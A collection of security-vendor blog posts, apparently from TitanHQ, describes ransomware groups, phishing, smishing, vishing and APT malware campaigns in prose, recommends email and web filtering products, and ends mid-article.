Expert Insights helps businesses identify the most powerful, innovative, and ease to use cybersecurity solutions through its website, and helps clear up the confusion about cybersecurity solutions through objective reviews, industry analysis, and interviews with industry leaders. The top cybersecurity products are listed on the website along with reviews and ratings from genuine users of the solutions. Expert Insights now helps more than 40,000 businesses each month select the most appropriate cybersecurity solutions to meet their needs.
The leading cybersecurity companies and their products are recognized each year in the Expert insights’ “Best-Of” Awards. Products are assessed by technology experts and the Expert Insights’ Editorial Team based on many factors, including market presence, technical features of the products, ease-of-use, and ratings by verified users of the products. Winners are selected in a range of different categories such as email security, web security, endpoint security, multi-factor authentication, backup, and many more.
“2020 was an unprecedented year of cybersecurity challenges, with a rapid rise in remote working causing a massive acceleration in cybercrime,” said Craig MacAlpine, CEO and Founder, Expert Insights. “Expert Insights’ Best-Of awards are designed to recognize innovative cybersecurity providers like TitanHQ that have developed powerful solutions to keep businesses safe against increasingly sophisticated cybercrime.”
TitanHQ was recognized for the WebTitan DNS filtering solution, which was named a winner in the Web Security category, SpamTitan was named a winner in the Email Security category, and ArcTitan was named a winner in the Email Archiving category. In addition to the level of protection provided, each solution is consistently rated highly on price and ease of use by enterprises, SMBs, and Managed Service Providers. The solutions are used by more than 8,500 businesses and over 2,500 MSPs in more than 150 countries. In addition to the high ratings on Experts’ Insights, the solutions have received top marks on G2 Crowd, Capterra, GetApp, Software Advice, and Google Reviews.
“The recent pandemic and the growth of remote working initiatives have further highlighted the need for multiple layers of cybersecurity and our award-winning solutions form key pillars in this security strategy,” said Ronan Kavanagh, CEO, TitanHQ. “We will continue to innovate and provide solutions that MSPs can use to deliver a consistent, secure and reliable experience to their customers.”
CLOP Ransomware is a fairly new ransomware variant that first emerged in early 2019, when it started to be used in attacks on large enterprises in the United States, Germany, Mexico, India, and Turkey. The number of attacks has been steadily increasing, with a major increase in attacks identified in October 2020. Since then, the ransomware has been used in many attacks on large enterprises and the ransom demands are often huge. An attack on the software company Software AG saw a ransom demand issued for $20 million.
As is the case with well over a dozen of the most prolific ransomware operations, the CLOP ransomware gang exfiltrates data prior to encrypting files. If victims have a valid backup and try to recover their encrypted files without paying the ransom, the group will leak stolen data on the darkweb making it available to other cybercriminal operations. The media are tipped off to the data dumps, and the subsequent coverage can result in companies suffering serious reputational damage. In recent months there have been many class action lawsuits filed following ransomware attacks where stolen data has been leaked online.
CLOP ransomware is believed to be operated by a threat group known as FIN11, which is an arm of a prolific Russian cybercriminal organization known as TA505. FIN11 has targeted many different industries, although recently manufacturing, healthcare and retail have been a major focus. When attacks are conducted on organizations and companies in these sectors, the losses from downtime can be considerable, which increases the likelihood of victims paying the ransom. One attack on the South Korean retailer E-Land saw 23 of its stores close when they were unable to access their IT systems. An attack on the German manufacturer Symrise AG rendered more than 1,000 computers inoperable, causing huge losses as manufacturing was halted. Attacks on the healthcare industry mean patient records cannot be accessed, which places patient safety at risk.
Many ransomware gangs have exploited weaknesses in Remote Desktop Protocol, VPN solutions, and vulnerabilities in software and operating systems to gain they access they need to internal networks to deploy ransomware. However, the initial attack vector in CLOP ransomware attacks (and also many other ransomware variants) is spam email. Large scale spam campaigns are conducted, often targeting certain industry sectors or geographical locations. These are referred to as “spray and pray” campaigns. The aim is to gain access to as many networks as possible. The ransomware gang can then pick and choose which companies are worthwhile attacking with ransomware.
Once CLOP ransomware is installed, detection can be difficult as the threat group has programmed the ransomware to disable antivirus software such as Microsoft Security Essentials and Windows Defender. The key to blocking attacks is to stop the initial infection, which means preventing the spam emails from reaching inboxes where they can be opened by employees.
Blocking the attacks requires an advanced spam filtering solution with robust antivirus protections. SpamTitan, for instance, uses dual antivirus engines to catch known malware variants and sandboxing to identify malicious attachments containing previously unknown malware, ransomware, or malicious scripts. Machine learning techniques are also employed to identify emerging threats in real time.
The spam emails used in these campaigns try to obtain credentials such Office 365 logins and passwords or get users to download malware downloaders. Additional protection against this phase of the attack can be provided by a web filter such as WebTitan. WebTitan blocks the phishing component of these attacks by preventing these malicious URLs from being accessed by employees, as well as blocking downloads of malware from the Internet.
Staff training is also important to help employees recognize phishing emails and multi-factor authentication should be implemented to prevent stolen credentials from being used to access email accounts and cloud apps.
If you want to improve your security defenses against ransomware, malware and phishing attacks, give the TitanHQ team a call and ask about SpamTitan and WebTitan. Both solutions are available on a free trial to allow you to see for yourself how effective they are at blocking threats and how easy the are to implement and use.
The COVID-19 pandemic created many new opportunities for cybercriminals who were all too happy to take advantage. In 2020, businesses had to rapidly change their working practices to deal with national lockdowns and changed to a more distributed, remote workforce. In response, cybercriminals stepped up phishing attacks to obtain credentials to email accounts, VPNs, and remote access solutions.
The increase in email threats and phishing activity was recently highlighted by the Anti-Phishing Working Group which has been gathering data on phishing attacks from its member organizations throughout the year. Its latest report shows phishing attacks doubled in 2020, peaking in October 2020 when previous records were shattered. In October, 225,304 new phishing sites were detected, compared with under 100,000 in January 2020. From August to December 2020, more than 200,000 new phishing sites were detected each month.
Links to these phishing websites are sent in large scale phishing campaigns and many of the messages land in inboxes where they attract a click. The pandemic made that much easier for cybercriminals who expertly exploited the thirst for knowledge about COVID-19 to conduct their scams. As the year progressed other COVID-19 themed lures were used including COVID-19 relief payments for businesses, offers of early vaccines, small business loans, tax deadline extensions, and many more.
Cybercriminals often use compromised websites for hosting their phishing forms, but it is now much more common for the attackers to purchase their own domains that are tailored for each phishing campaign. These lookalike domains can easily fool individuals into believing they are on a legitimate website.
Cybercriminals have also been using encryption to hide their phishing URLs and fool employees. Hosting phishing URLs on HTTPS sites can fool employees into believing the web content is genuine, and many security solutions do not examine encrypted content which makes the URLs hard to identify and block. In Q4, 2020, 84% of phishing URLs used SSL encryption.
The increase in use of SSL encryption is a concern, as many people mistakenly believe that a site starting with HTTPS is secure when that is not the case. SSL inspection means the connection between the browser and the website is secure, which means users are protected against the interception of sensitive information, but a cybercriminal may own or control that website. The secure connection just means other cybercriminals will not be able to intercept login credentials as they are entered on a phishing site.
The problem for businesses has been how to block these threats as they grow in number and sophistication. Many businesses have previously relied on Office 365 anti-spam protections for blocking spam and phishing threats, but large volumes of these malicious emails are delivered to Office 365 inboxes. When that happens and a malicious link is clicked, they have no way of stopping employees from disclosing sensitive information.
One way that businesses can better protect against these phishing attacks is by implementing a web filtering solution with SSL inspection. WebTitan for instance can decrypt websites, inspect the content, and then re-encrypt which means malicious websites are not hidden and can be identified and blocked.
WebTitan also incorporates multiple threat intelligent feeds to ensure that as soon as a phishing URL is detected, all WebTitan users will be immediately protected. WebTitan ensures that protection is provided against emerging phishing URLs and zero-minute threats. When combined with an advanced spam filtering solution such as SpamTitan to block phishing emails at source and ensure they do not reach inboxes, businesses will be well protected against phishing attacks.
In 2020, the healthcare industry was heavily targeted by ransomware gangs who took advantage of the pandemic to hit the very hospitals that were trying to save patients’ lives. Battling under extremely challenging conditions, the healthcare industry had to cope with these highly damaging and disruptive ransomware attacks that placed patient safety at risk.
A major ransomware attack hit one of the largest healthcare providers in the United States. Universal Health Services, an American Fortune 500 company which employees 90,000 individuals and runs 400 acute care hospitals, suffered a major ransomware attack in September which impacted all of its hospitals. Staff were forced to work on pen and paper for three weeks while it recovered from the attack.
A cyberattack on University of Vermont Medical Center in October affected more than 5,000 hospital computers and laptops and 1,300 servers. All devices had to be wiped and have software and data reinstalled, with the healthcare provider experiencing downtime for more than 2 months. During the recovery process around $1.5 million was being lost per day to attack-related expenses and lost business, with the total costs expected to exceed $64 million.
Ransomware attacks on the healthcare industry were stepped up in September and October and continued to plague the industry for the remainder of the year. A study by Tenable found that ransomware attacks accounted for 46% of all healthcare data breaches in 2020, showing the extent to which the industry was targeted.
Many of these attacks involved the exploitation of unpatched vulnerabilities, most commonly vulnerabilities in the Citrix ADC controller and Pulse Connect Secure VPN. Patches had been released at the start of the year to fix the vulneabilities, but the patches had not been applied promptly. Phishing emails also gave ransomware gangs the access to healthcare networks they needed to conduct ransomware attacks. Check Point’s research indicates there was a 45% increase in cyberattacks on the industry from the start of November to the end of the year.
Another industry heavily targeted by hackers in 2020 was retail. Retailers were also incredibly busy as a result of the pandemic. With governments ordering people to stay home to curb the spread of the virus, online retailers saw a sales surge as shoppers made their purchases online rather than in bricks and mortar stores. Researchers at Salesforce found digital sales increased by 36% in 2020 compared to the previous year, and cybercriminals took advantage of the increase in online sales.
Several methods were used to gain access to retailers’ systems and websites, with the most popular tactic being web application attacks, which increased by 800% in 2020 according to the CDNetworks State of Web Security H1 2020 Report. Attackers also used credentials stolen in past data breaches to attack online retail outlets in credential stuffing attacks, which Akamai’s tracking revealing the retail industry was the most attacked industry using this attack technique, account for around 90% of attacks.
As is normal every year, the large numbers of shoppers that head online to make purchases in the run up to Black Friday and Cyber Monday were exploited, with phishing attacks related to these shopping events increasing thirteenfold in the six-week run up to Black Friday. In November, 1 in every 826 emails was an online shopping related phishing scam, compared to 1 in 11,000 in October, according to Check Point. Content management systems used by retailers were also targeted, and attacks on retail APIs also increased in 2020.
As we head into 2021, both sectors are likely to continue to be heavily targeted. Ransomware and phishing attacks on healthcare providers could well increase now that vaccines are being rolled out, and with many consumers still opting to buy online rather than in person, the retail sector looks set to have another bad year.
Fortunately, by following cybersecurity best practices it is possible to block the majority of these attacks. Patches need to be applied promptly, especially any vulnerabilities in remote access software, VPNs, or popular networking equipment, as those vulnerabilities are rapidly exploited.
An advanced anti-phishing solution needs to be implemented to block phishing attacks at source and ensure that malicious messages do not get delivered to inboxes. Multi-factor authentication should also be implemented on email accounts and remote access solutions to block credential stuffing attacks.
A web filter is important for blocking the web-based component of phishing and cyberattacks. Web filters stop employees from visiting malicious websites and block malware/ ransomware downloads and C2 callbacks. And for retail especially, the use of web application firewalls, secure transaction processing, and the correct use of Transport Layer Security across a website (HTTPS) are important.
By following cybersecurity best practices, healthcare providers, retailers, and other targeted industries will make it much harder for hackers to succeed. TitanHQ can help by providing SpamTitan Email Security and WebTitan Web Security to protect against email and web-based attacks in 2021. For more information on these two solutions and how you can use them to protect your busines, call TitanHQ today.
Cybercriminals use many tactics to obtain credentials that they then use to remotely access corporate accounts, cloud services, and gain access to business networks. Phishing is the most common method, which is most commonly conducted via email. Attackers craft emails using a variety of lures to trick the recipient into visiting a malicious website where they are required to enter their credentials that are captured and used by the attackers to remotely access the accounts.
Businesses are now realizing the benefits of implementing an advanced spam filtering solution to block these phishing emails at source and ensure they do not reach inboxes. Advanced antispam and anti-phishing solutions will block virtually all phishing attempts, so if you have yet to implement such a solution or you are relying on Microsoft Office 365 protections, we urge you to get in touch and give SpamTitan a trial.
Phishing is not only performed via email. Rather than using email to deliver the hook, many threat groups use SMS or instant messaging platforms and increasing numbers of phishing campaigns are now being conducted by telephone and these types of phishing attack are harder to block.
Smishing for Credentials
When phishing occurs through SMS messages it is known as Smishing. Rather than an email, an SMS message is sent with a link that users are instructed to click. Instant messaging platforms such as WhatsApp are also used. Many different lures are used, but it is common for security alerts to be sent that warn the recipient about a fraudulent transaction or other security threat that requires them to login to their account.
Recently, Allied Irish Bank (AIB) customers in Ireland were targeted with such as smishing campaign. The SMS message advises the recipient that there has been a suspected fraudulent transaction which they are required to review by clicking a link and logging in. Their credentials are harvested, and they are instructed to provide codes from their card reader or one-time passwords as part of the security check. Doing so will allow the scammers to access the account and make fraudulent transactions. A variation on this theme involves the user being told they have been locked out of their account.
In this campaign the scammers use a URL on the domain secureonlineservicepayeeroi.com, although these domains frequently change. Many campaigns mask the destination URL using URL shortening services, and one recent campaign conducted by an Iranian threat group used a seemingly legitimate google.com URL and several redirects before the user landed on the phishing page. Smishing is also often used in PayPal phishing attacks using messages warning about the closure of an account.
Vishing Attacks on Businesses Spike
In December 2019, the U.S. Federal Bureau of Investigation (FBI) identified a campaign where cybercriminals were conducting phishing over the telephone – termed vishing. Since then, the number of cases of vishing attacks has increased, prompting the FBI and the Cybersecurity and Infrastructure Security Agency to issue a joint alert in the summer about a campaign targeting remote workers. This month, the FBI has issued a further alert following a spike in vishing attacks on businesses.
Cybercriminals often target users with high levels of privileges, but not always. There has been a growing trend for cybercriminals to target all credentials, so all users are at risk. Once one set of credentials is obtained, attempts are made to elevate privileges and reconnaissance is performed to identify targets in the company with the level of permissions they need – I.e. permissions to perform email changes.
The scammers make VoIP calls to employees and convince them to visit a webpage where they need to login. In one attack, an employee of the company was found in the company’s chatroom, and was contacted and convinced to login to their company’s VPN on a fake VPN page. Credentials were obtained and used to perform reconnaissance. Another target was identified that likely had advanced permissions, and that individual was contacted and scammed into revealing their credentials.
How to Block Smishing and Vishing Attacks
Blocking these types of phishing attacks requires a combination of measures. In contrast to email phishing, these threats cannot be easily blocked at source. It is therefore important to cover these threats in security awareness training sessions as well as warning about the risks of email phishing.
A web filtering solution is recommended to block attempts to visit the malicious domains where the phishing pages are hosted. Web filters such as WebTitan can be used to control the websites that employees can access on their corporate-issued phones and mobile devices and will provide protection no matter where an employee accesses the Internet.
It is also important to set up multifactor authentication to prevent any stolen credentials from being used by attackers to remotely access accounts. The FBI also recommends granting network access using the rule of least privilege: ensuring users are only given access to the resources they need to complete their jobs. The FBI also recommends regularly scanning and auditing user access rights given and monitoring for any changes in permissions.
COVID-19 has made 2020 a terrible year for many businesses, bringing unprecedented challenges that many have struggled to overcome. The year was made worse by cybercriminals stepping up their attacks, with ransomware used to pile even more misery during extremely challenging times.
Ransomware is nothing new of course. It has been used since the early 2000s to extort money from individuals and businesses. Ransomware grew in popularity in the mid-2010s when encryption methods were adopted that were tough to crack, and the past couple of years have seen ransomware grow into the biggest cyber threat for businesses, and 2020 has been especially bad.
In Q3, 2020, ransomware attacks increased by 40% according to data from Kroll. Almost 200 million attacks occurred in the quarter, and attacks continued to increase as the year progressed. Not only are more businesses now being attacked, the amount demanded by the attackers has also dramatically increased. A report from Coveware, a firm that assists companies recovering from ransomware attacks, indicates ransom demands doubled in Q4, 2019 and there has been another doubling of demands in 2020. A recent H1 2020 Cyber Insurance Claims Report from Coalition indicates 87% of all cyber-related insurance claims are the result of ransomware attacks.
Ransomware gangs have also adopted a new tactic to increase the likelihood of their ransom demand being paid. In 2019, the Maze ransomware gang started stealing data prior to encrypting files and using double extortion tactics. In addition to paying to recover data, victims had to pay to prevent the public release of their stolen data. Since then, at least 17 ransomware gangs have adopted this tactic and threaten to publish or sell stolen data if the ransom is not paid.
The healthcare industry was hit particularly hard by ransomware in 2020, especially in the latter half of the year. Healthcare systems and hospitals have been battling with the pandemic and during these extremely challenging times they have been targeted by ransomware gangs. There was a major spike in attacks on hospitals in September and the attacks have continued at high levels since.
The pandemic has given ransomware gangs new opportunities to conduct attacks, as more remote workers introduced vulnerabilities that are easy for the gangs to exploit. Vulnerabilities in new VPN and remote access solutions are exploited, emails spreading ransomware have targeted remote workers, and ransomware has been delivered via drive-by downloads masquerading as free online collaboration tools. COVID-19 has also been exploited in lures that deliver ransomware, first offering advice on the new virus, then possible cures, and latterly vaccine related lures.
The large increase in attacks toward the end of 2020 does not bode well for 2021, and there are no signs that ransomware activity will fall in 2021. In fact, the situation may even get worse before it gets better. As long as ransomware attacks continue to be profitable, the attacks will continue. What businesses need to do is make sure they take steps to block attacks, identify them quickly when they do occur, and make sure they have a plan in place to help them recover quickly should disaster strike.
Some of the important steps to take to prevent, detect, and limit the severity of an attack are summarized below:
With so many methods of deploying ransomware, there is no single solution that will prevent all attacks. You should therefore consider the following:
Implement an advanced spam filter with best of breed protection against malware and ransomware, that uses signature-based detection to block known ransomware variants and sandboxing to identify new threats.
Ensure patches are applied promptly and software is updated quickly to the latest version.
Train your staff how to recognize email-based threats and provide general security training to eliminate risky behaviors.
Stay up to date on the latest threat intelligence and take proactive steps to address threats.
Use a web filtering solution to block access to risky and malicious websites to prevent downloads of ransomware from the Internet.
Enforce the use of strong passwords to prevent brute force attacks.
If you can detect unauthorized accessing of your systems in real time, you may be able to block an attack before ransomware is deployed. Many threat actors spend time moving laterally to identify as many devices as possible before conducting an attack and they will attempt to find and exfiltrate data, which provides a window to detect and block the attack. You should implement a monitoring system in place that generates alerts when suspicious activity is detected and, ideally, one that can automatically remediate attacks when they are detected. Many attacks occur at the weekend and public holidays when monitoring by IT teams is likely to be reduced so consider the mechanisms you have in place when staffing levels are lower.
You may not be able to block an attack, but you can prepare and limit the damage caused. First and foremost, backup your data as you do not want to be at the mercy of the attackers. Ensure a backup is stored in a location that cannot be accessed from the network where the data resides, store a copy of a backup on a non-networked device, and ensure backups are performed regularly and are checked to make sure data can be recovered.
You should also create a disaster recovery plan that can kick into action as soon as an attack occurs to make sure your business can continue to function until the attack is fully mitigated.
A malware delivery campaign has been identified that uses phishing emails, malicious macros, PowerShell, and steganography to deliver a malicious Cobalt Strike script.
The initial phishing emails contain a legacy Word attachment (.doc) with a malicious macro that downloads a PowerShell script from GitHub if allowed to run. That script in turn downloads a PNG image file from the legitimate image sharing service Imgur. The image contains hidden code within its pixels which can be executed with a single command to execute the payload. In this case, a Cobalt Strike script.
Cobalt Strike is a commonly used penetration testing tool. While it is used by security professionals for legitimate security purposes, it is also of value to hackers. The tool allows beacons to be added to compromised devices which can be used to execute PowerShell scripts, create web shells, escalate privileges, and provide remote access to devices. In this campaign, the hiding of the code in the image and the use of legitimate services such as Imgur and GitHub helps the attackers avoid detection.
The hiding of code within image files is known as steganography and has been used for many years as a way of hiding malicious code, typically in PNG files to prevent the code from being detected. With this campaign the deception doesn’t end there. The Cobalt Strike script includes an EICAR string that is intended to fool security solutions and security teams into classing the malicious code as an antivirus payload, except contact is made with the attacker’s command and control server and instructions are received.
This campaign was identified by researcher ArkBird who likened the campaign to one conducted by an APT group known as Muddywater, which emerged around 2017. The threat group, aka Static kitten/Seedworm/Mercury, primarily conducts attacks on Middle eastern countries, commonly Saudi Arabia and Iraq, although the group has been known to conduct attacks on European and US targets. It is unclear whether this group is responsible for the campaign.
Naturally one of the best ways to block these types of attacks is by preventing the malicious email from being delivered to inboxes. A spam filter such as SpamTitan that incorporates a sandbox for analyzing attachments in safety will help to ensure that these messages do not get delivered to inboxes. End user training is also recommended to ensure that employees are made aware that they should never enable macros in Word Documents sent via email.
A web filtering solution is also beneficial. Web filters such as WebTitan can be configured to give IT teams control over the web content that employees can access. Since GitHub is commonly used by IT professionals and other employees for legitimate purposes, an organization-wide block on the site is not recommended. Instead, a selective block can be placed for groups of employees or departments that prevents GitHub and other potentially risky code sharing sites such as PasteBin from being accessed, either deliberately or unintentionally, to provide an extra layer of protection.
The Advanced Persistent Threat (APT) group APT32 – aka OceanLotus – is conducting a malware campaign targeting Apple MacOS users. APT32 is a nation-state hacking group that primarily targets foreign companies operating in Vietnam. The data exfiltrated by the hackers is believed to be used to give Vietnamese companies a competitive advantage, although the exact motives behind the attacks are opaque.
The group is known for using fully featured malware which is often delivered via phishing emails and commercially available tools. The latest malware variant was identified by security researchers at Trend Micro, who tied the malware to APT32 due to code similarities with other malware variants known to have been used by the group. The malware is a MacOS backdoor that allows the group to steal sensitive information such as business documents. The malware also gives the attackers the ability to download and install additional malicious programs on victim computers.
The malware is being delivered via phishing emails that have a zip file attachment which is disguised as a Microsoft Word document. If the recipient is convinced to open the attached file, no Word document will be opened, but the first stage of the payload will execute in the background. The first stage changes access permissions which allows the second stage payload to be executed, which prompts the third stage of the payload that downloads and installs the backdoor on the system. This multi-stage delivery of the backdoor helps the malware to evade security solutions.
Protecting against attacks involves blocking the initial attack vector to prevent the phishing emails from being delivered to end users. End user security awareness training should be provided, and employees conditioned not to open email attachments from unknown senders. It is also recommended to ensure computers are kept fully patched, as this will limit the ability of the group to use its malware to perform malicious actions.
Chinese TA416 APT Group Delivering New Variant of PlugX RAT
The APT group TA416 – aka Mustang Panda/Red Delta – is conducting a campaign to distribute a new variant of its PlugX Remote Access Trojan (RAT). TA416 is a nation state sponsored group with strong links to the Chinese government and has previously conducted attacks on a wide range of targets around the world.
The group is known for using spear phishing emails and social engineering techniques to deliver malware that allows the hackers to gain full control of an infected computer. The attacks are conducted for espionage purposes; however, the malware has an extensive range of capabilities. In addition to stealing data, the malware can copy, move, rename, execute, and delete files, log keystrokes, and perform many other actions.
The new campaign delivers two RAR archives, which act as droppers for its PlugX malware. The theme of the emails in the latest campaign are a supposed new agreement between the Vatican and the Chinese Communist Party.
The campaign was identified by researchers at Proofpoint, who could not pinpoint the exact delivery method; however, TA416 is known to use Google Drive and Dropbox URLs in its phishing emails to deliver malicious payloads. One of the RAR files is a self-extracting archive that extracts four files and executes an Adobelm.exe file, which delivers a Golang version of the PlugX malware. The recent update to the PlugX RAT helps it evade security solutions.
Combating the APT Threat
The tactics used by these and other APT groups to deliver malware are constantly changing, with phishing campaigns regularly tweaked to increase the likelihood of end users performing the desired action and to prevent the campaigns being detected by anti-virus and anti-phishing solutions. The changes to the malware and campaigns are effective and can easily fool end users and bypass technical controls, especially signature-based antivirus solutions.
Advanced AI-based cybersecurity solutions are required to detect and block these threats. These solutions detect known malware variants and can also identify zero-day malware threats and never-before seen phishing campaigns. The solutions work by protecting against the two most common attack vectors – email and the web – and prevent malicious messages from reaching inboxes and block downloads of malicious files from attacker-controlled websites.
Cybercriminals are using an increasing range of tactics, techniques and procedures to fool the unwary into disclosing their credentials or installing malware, which is making it hard for end users to distinguish between genuine and malicious messages.
It is common for cybercriminals to purchase lookalike domains for use in phishing scams and for distributing malware. Oftentimes the domains purchased are very similar to the domains they impersonate, aside from one or two changed letters.
For instance, the letters v v could be used in place of a w for a domain spoofing Wal-Mart – e.g. VVal-Mart. In internationalized domain name (IDN) homograph attacks, aka script spoofing, Greek, Latin, and Cyrillic letters are used in domains instead of standard letters. This can lead to domains being almost indistinguishable from the domains they are spoofing, especially since the web pages hosted on those domains include the logos and color schemes used on the official websites.
FBI Warns of Use of Spoofed FBI Domains
Recently the Federal Bureau of Investigation (FBI) issued a warning following the discovery that many FBI-related domain names have been purchased that closely resemble official FBI websites. While these domains are not believed to have been used for malicious purposes to date, it is probable that the individuals registering these domains were intending to use them in phishing attacks, for distributing malware, or for disinformation campaigns. The domains include fbidefense.com, fbimaryland, fbi-ny, fib.ca, fbi-intel.com, fbi.systems, and fbi.health.
These domains can be used to host phishing kits or exploit kits, but the domains can be used to create official-looking email addresses. An email from one of these domains, that has the FBI in the name, could easily scare someone into taking an action demand in the email, such as disclosing their login credentials or opening a malicious email attachment.
Legitimate Cloud Services Leveraged in Sophisticated Phishing Attacks
There have also been phishing campaigns detected in recent weeks that use legitimate cloud services to mask the malicious nature of the emails. Campaigns have been detected that use links to Google Forms, Google Docs, Dropbox, and cloud services from Amazon and Oracle. Emails are sent that include fake notifications with links to these cloud services; however, once the link is clicked, the user is taken through a series of redirects to a malicious website hosting fake Office 365 login prompts that steal credentials.
Several of these campaigns involved checks to make sure the recipient is a real person, with automated responses directed to official domains to prevent analysis. Phishers are also continuing to use typosquatting – the name given to the use of domains with natural typographical errors – to catch out careless typists.
Sophisticated Campaigns Call for Sophisticated Cybersecurity Defenses
The sophisticated nature of today’s phishing and malware campaigns, together with cybercriminals’ constantly changing tactics, techniques, and procedures, mean it is becoming harder for end users to distinguish between genuine and malicious emails. End user security awareness training is still important, but it has never been more important to have effective technical solutions in place to ensure that these threats are identified and blocked before any harm is caused.
The first line of defense against phishing is an email security gateway solution through which all emails need to pass before they reach inboxes. These solutions need to use a range of advanced mechanisms for identifying malicious and suspicious emails, so should one mechanism fail to identify a malicious email, others are in place to provide protection.
SpamTitan from TitanHQ is one such solution that incorporates many layers of protection to detect and block phishing and malware attacks via email. Checks are performed on the message headers, content is analyzed, and machine learning is incorporated to identify never before seen threats, in addition to blacklisting of known malicious email addresses and domains. To block malware threats, SpamTitan uses dual anti-virus engines to block known threats and sandboxing to identify and block zero-day malware threats. Working seamlessly together, these mechanisms will block 99.97% of malicious messages.
An additional anti-phishing solution that you may not have considered is a web filtering solution. Web filters are important for blocking the web-based component of phishing attacks and preventing individuals from visiting sites used for malware delivery. A web filter can also block redirects to malicious websites that hide behind links to legitimate cloud services.
WebTitan from TitanHQ is a smart, DNS-based web filtering solution that uses automation and advanced analytics to block emerging phishing and other malicious URLs, not just those that have been already used in attacks and have been added to blacklists. Through the use of AI-based technology, WebTitan can provide protection from zero-minute threats.
Advanced cybersecurity defenses do not need to be complicated for end users to use. Both SpamTitan and WebTitan have been developed to be easy to implement, use, and maintain. While they incorporate all the required protections and allow advanced users to drill down and analyze threats, they can also easily be used to protect networks and devices by users with little technical skill. The ease of implementation, use, and maintenance together with the superb threat protection are why the solutions are consistently rated so highly on review sites such as Capterra, GetApp, Software Advice, and on Google Reviews.
To improve your defenses against cybersecurity threats delivered via email and via the web, give the TitanHQ a team a call today and find out more about SpamTitan Email Security and WebTitan DNS filtering.
The first known ransomware attack occurred in 1989, but in the years since this form of malware has not proven popular with cybercriminals. That started to change in 2013 with Cryptolocker and the number of attacks – and ransomware threats as continued to grow ever since.
Today, ransomware is one of the biggest malware threats faced by businesses. Ransomware attacks are no longer relatively small campaigns conducted by ransomware developers. Rather than conduct their own attacks, it is now common for ransomware developers to leave the distribution of the ransomware to a network of affiliates. Under the ransomware-as-a-service model, more attacks can be conducted and more ransoms will be paid as a result. Most ransomware operations now operate under this RaaS model and there is no shortage of affiliates willing to distribute the ransomware for a cut of the profits.
While ransomware was once used simply to encrypt files and prevent them from being accessed by businesses unless a ransom was paid for the keys to decrypt files, the Maze ransomware operators started stealing data in 2019 prior to file encryption to add an extra incentive for victims to pay up. Many other ransomware operations followed suit and either threatened to publish the stolen data or sell it on to other cybercriminals if the ransom is not paid.
Data theft prior to file encryption is fast becoming the norm. Coveware, a company that works with ransomware victims to resolve ransomware attacks (often entering into negotiations with the attackers on behalf of its clients), recently published a report that shows half of all ransomware attacks now involve data theft prior to file encryption. It may be possible to recover encrypted data from backups, but that will not prevent the publication or misuse of stolen data.
This tactic has proven to be effective for the ransomware gangs, but there have been many cases where payment of the ransom has not resulted in the deletion of stolen data. In the United States, several victims in the healthcare industry have paid the ransom demand only to receive a second demand for a payment to prevent stolen data from being released.
According to Coveware, the Sodinokibi ransomware gang is known to issue further demands after the initial payment is made, and it has been a similar case with Netwalker and Mespinoza ransomware. The operators of Conti ransomware provide proof that files are deleted after the ransom is paid, but that proof is faked.
Ransom demands are also increasing. The average ransom demand in Q3, 2020 was $234,000, up 31% from the previous quarter according to the Coveware Quarterly Ransomware Report.
The healthcare industry has been extensively targeted by ransomware gangs and attacks have increased during the COVID-19 pandemic. The healthcare industry is heavily reliant on data and attacks aim to encrypt patient data and steal medical records prior to encryption. If the ransom is not paid, the data has a high value and can be sold on easily.
Recently, a joint warning was issued by the U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA), in conjunction with the FBI and the Department of Health and Human Services, warning of an increased and imminent threat of targeted ransomware attacks on the healthcare and public health sectors. A few days after the alert was issued, 6 healthcare providers were attacked with Ryuk ransomware in a single day.
Ransomware attacks are here to stay for the foreseeable future. They will only start to decline when they are no longer profitable. With attacks at record levels and no guarantee that stolen data will be returned even I the ransom is paid, it is more important than ever for businesses and healthcare organizations to ensure their defenses are hardened against ransomware attacks.
Ransomware can be delivered using a variety of techniques. Vulnerabilities in software and operating systems are commonly exploited to gain access to networks, so vulnerability scanning is important for identifying exploitable vulnerabilities to ensure they are promptly addressed before they can be exploited.
Email remains one of the most common attack vectors, not only for delivering ransomware, but delivering ransomware downloaders. Emotet and TrickBot are two Trojans commonly used to deliver ransomware as a secondary payload, and both are primarily delivered via email, as is BazarLoader, which has been used to deliver ransomware in many recent attacks.
To block this attack vector, an advanced AI-powered spam filter is required – one that is capable of not only detecting known malware threats, but zero-day malware and email attacks that have not been seen before. SpamTitan uses AI and machine learning techniques to identify these email threats at source and prevent them from being delivered to inboxes where employees unwittingly provide the attackers with access to their networks. In addition to dual anti-virus engines, SpamTitan has a sandboxing feature for identifying zero-day malware threats and SPF, DKIM, and DMARC to detect and block email impersonation attacks.
Ransomware, ransomware droppers, and other malware threats are often delivered via the Internet, so cybersecurity measures are needed to block this attack vector. WebTitan similarly uses AI and machine learning techniques to provide protection from websites used to deliver malware threats. The solution uses automation and advanced analytics to search through billions of URLs/IPs and phishing sites that could comprise a company and ensure those threats are blocked.
By implementing layered defenses, it is possible to block the majority of threats, but it is still important to ensure that your data is protected in the event that an attack succeeds. You should make sure that come what may, your data is secured.
A good approach to adopt is the 3-2-1 backup strategy, which involves making three backups, storing the copies on 2 different media (tape, disc, or cloud for instance), and ensuring one copy is stored securely off site. Should an attack succeed, you will not be at the mercy of the attackers and will at least be able to recover your data without paying the ransom.
If you want to improve your defenses against ransomware, give the TitanHQ team a call today for information and advice on the steps you can take to harden your defenses.
Phishers are constantly coming up with new scams that abuse trust. People tend to trust their favorite brands and when email communications are sent by those companies there is a tendency for the emails to be trusted. The same is true when emails are sent from email contacts such as work colleagues and friends. Cybercriminals take advantage of trust to get users to take a specific action, such as clicking on an embedded hyperlink in an email or opening an email attachment.
Many businesses now provide security awareness training to employees and try to teach them to always be vigilant and never to trust emails implicitly, even if they have been sent by known contacts. Just because an email has been sent from a known and trusted email account does not mean the message is genuine. Email accounts are often compromised and used to send phishing emails. The Emotet Trojan hijacks email accounts and uses them to send copies of itself to the victim’s contacts, and several other malware variants do the same. Email addresses are also spoofed. The display name may be correct or believable, but the actual email account used to send the message is anything but.
Another tactic is now being used by at least one cybercriminal group than similarly abuses trust, albeit in a new way. A phishing campaign, which was first detected on September 21, 2020, uses the challenge-response test CAPTCHA to simultaneously make the campaign believable and also to reduce the probability of the scam being detected by email security solutions.
Internet users will be familiar with CAPTCHA, although maybe not by name. The CAPTCHA system is used by many websites as a way to determine if a website visitor is a human or a bot, most commonly on forms.
